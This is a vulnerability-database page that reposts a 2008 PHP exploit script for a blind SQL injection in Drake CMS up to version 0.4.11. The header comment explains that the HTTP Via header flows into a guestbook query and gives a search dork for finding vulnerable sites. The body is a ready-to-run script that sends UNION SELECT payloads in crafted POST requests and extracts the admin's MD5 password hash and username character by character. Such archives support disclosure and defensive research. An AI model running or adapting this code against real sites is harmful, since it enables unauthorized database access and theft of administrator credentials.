Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:65304
HistoryJul 01, 2014 - 12:00 a.m.

Drake CMS <= 0.4.11 Remote Blind SQL Injection Exploit

2014-07-0100:00:00
Root
www.seebug.org
31
JSON

No description provided by source.


                                                &#60;?php

/*
	------------------------------------------------------
	Drake CMS &#60;= 0.4.11 Remote Blind SQL Injection Exploit
	------------------------------------------------------

	author...: EgiX
	mail.....: n0b0d13s[at]gmail[dot]com
	
	link.....: http://drakecms.sourceforge.net/
	dork.....: &#34;Powered by Drake CMS&#34; inurl:index.php?option=guestbook
	
	[-] Blind SQL Injection in /components/guestbook/guestbook.php

	15.	case &#34;insert&#34; :
	16.		if (!$my-&#62;gid) {
	17.			if (&#39;&#39; === ($gb_name = in(&#39;gb_name&#39;, __SQL | __NOHTML, $_POST, &#39;&#39;, 50))
	18.				|| (&#39;&#39; === ($gb_email = in(&#39;gb_email&#39;, __SQL | __NOHTML, $_POST, &#39;&#39;, 50)))
	19.				|| !is_email($gb_email)
	20.				)
	21.				CMSResponse::Back(_FORM_NC);
	22.		} else {
	23.			$gb_name = $my-&#62;name;
	24.			$gb_email = $my-&#62;email;
	25.		}
	26.	
	27.		$timeout = $params-&#62;get(&#39;timeout&#39;,5);
	28.	
	29.		$row = $conn-&#62;GetRow(&#34;SELECT id,ip,date FROM #__guestbook WHERE ip =&#39;&#34;.$my-&#62;GetIP().&#34;&#39; AND date &#62; &#39;&#34;.($time-($timeout*60)).&#34;&#39; &#34;); &#60;==
	30.	
	31.		if(!count($row)) {
	32.			if ($params-&#62;get(&#39;captcha&#39;) && !$my-&#62;valid_captcha())
	33.				break;
	34.			
	35.			$gb_url = in(&#39;gb_url&#39;, __SQL | __NOHTML, $_POST, &#39;&#39;);
	36.			$gb_country = in(&#39;gb_country&#39;, __SQL | __NOHTML, $_POST, &#39;&#39;, 50);
	37.			$gb_title = in(&#39;gb_title&#39;, __SQL | __NOHTML, $_POST, &#39;&#39;, 255);
	38.			$gb_message = in(&#39;gb_message&#39;, __SQL | __NOHTML, $_POST, &#39;&#39;);
	39.	
	40.			$conn-&#62;Insert(&#39;#__guestbook&#39;, &#39;(name,email,url,country,title,message,ip,date)&#39;,&#34;&#39;$gb_name&#39;,&#39;$gb_email&#39;,&#39;$gb_url&#39;, (...)
	41.	
	42.		} else
	43.			echo _GUESTBOOK_DOUBLE_SIGN;
	
	if you analize GetIP() function defined into /classes/user.php (lines 61-66) you can see that an attacker
	could be inject arbitrary SQL code through http via header...this results in a blind SQL injection at line 29
	
	[-] look at /includes/retrieve_ip.php
	
	69.		if(isset($_SERVER[&#39;HTTP_VIA&#39;])) {
	70.			// case 2: 
	71.			// proxy && HTTP_(X_) FORWARDED (_FOR) not defined && HTTP_VIA defined
	72.			// other exotic variables may be defined 
	73.			return ( $_SERVER[&#39;HTTP_VIA&#39;].$x_coming_from.$coming_from ) ; &#60;== this is the same value returned from GetIP()
	74.		}
	
*/

error_reporting(0);
set_time_limit(0);
ini_set(&#34;default_socket_timeout&#34;, 5);

function http_send($host, $packet)
{
	$sock = fsockopen($host, 80);
	while (!$sock)
	{
		print &#34;\n[-] No response from {$host}:80 Trying again...\n&#34;;
		$sock = fsockopen($host, 80);
	}
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	fclose($sock);
	return $resp;
}

function check_query($sql)
{
	global $host, $path;
	
	$payload = &#34;gb_name=null&gb_email=foo%40bar.com&task=insert&#34;;
	$packet  = &#34;POST {$path}index.php?option=guestbook HTTP/1.0\r\n&#34;;
	$packet .= &#34;Host: {$host}\r\n&#34;;
	$packet .= &#34;Via: {$sql}\r\n&#34;;
	$packet .= &#34;Content-Type: application/x-www-form-urlencoded\r\n&#34;;
	$packet .= &#34;Content-Length: &#34;.strlen($payload).&#34;\r\n&#34;;
	$packet .= &#34;Connection: close\r\n\r\n&#34;;
	$packet .= $payload;

	return (!preg_match(&#34;/UNION\/\*\*\/SELECT/&#34;, http_send($host, $packet)));
}

print &#34;\n+----------------------------------------------------------------+&#34;;
print &#34;\n| Drake CMS &#60;= 0.4.11 Remote Blind SQL Injection Exploit by EgiX |&#34;;
print &#34;\n+----------------------------------------------------------------+\n&#34;;

if ($argc &#60; 3)
{
	print &#34;\nUsage......:	php $argv[0] host path [userid] [prefix]\n&#34;;
	print &#34;\nhost.......:	target server (ip/hostname)&#34;;
	print &#34;\npath.......:	path to Drake CMS directory (example: / or /drake/)&#34;;
	print &#34;\nuserid.....:	user id (default: 1 - admin)&#34;;
	print &#34;\nprefix.....:	table&#39;s prefix (default: dk_)\n&#34;;
	die();
}

$host = $argv[1];
$path = $argv[2];
$uid  = (isset($argv[3]) ? $argv[3] : &#34;1&#34;);
$pre  = (isset($argv[4]) ? $argv[4] : &#34;dk_&#34;);

$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$index = 1; $md5 = &#34;&#34;;
print &#34;\n[-] MD5 Hash: &#34;;

while (!strpos($md5, chr(0)))
{
	for ($i = 0, $n = count($hash); $i &#60;= $n; $i++)
	{
  		if ($i == $n) die(&#34;\n\n[-] Exploit failed...\n&#34;);
		$sql = &#34;-1&#39;/**/UNION/**/SELECT/**/password,1,1/**/FROM/**/{$pre}users/**/WHERE/**/ORD(SUBSTR(password,{$index},1))={$hash[$i]}/**/AND/**/id={$uid}/*&#34;;
		if (check_query($sql)) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break; }
	}

	$index++;
}

$char = array(0); // null char
for ($j = 97; $j &#60;= 122; $j++) $char = array_merge($char, array($j)); // a-z
for ($j = 65; $j &#60;= 90; $j++) $char = array_merge($char, array($j)); // A-Z
for ($j = 48; $j &#60;= 57; $j++) $char = array_merge($char, array($j)); // 0-9

$index = 1; $user = &#34;&#34;;
print &#34;\n[-] Username: &#34;;

while (!strpos($user, chr(0)))
{
	for ($i = 0, $n = count($char); $i &#60;= $n; $i++)
	{
  		if ($i == $n) die(&#34;\n\n[-] Exploit failed...\n&#34;);
		$sql = &#34;-1&#39;/**/UNION/**/SELECT/**/username,1,1/**/FROM/**/{$pre}users/**/WHERE/**/ORD(SUBSTR(username,{$index},1))={$char[$i]}/**/AND/**/id={$uid}/*&#34;;
		if (check_query($sql)) { $user .= chr($char[$i]); print chr($char[$i]); break; }
	}

	$index++;
}

print &#34;\n\n[-] Successfull!\n&#34;;

?&#62;

# milw0rm.com [2008-04-07]
JSON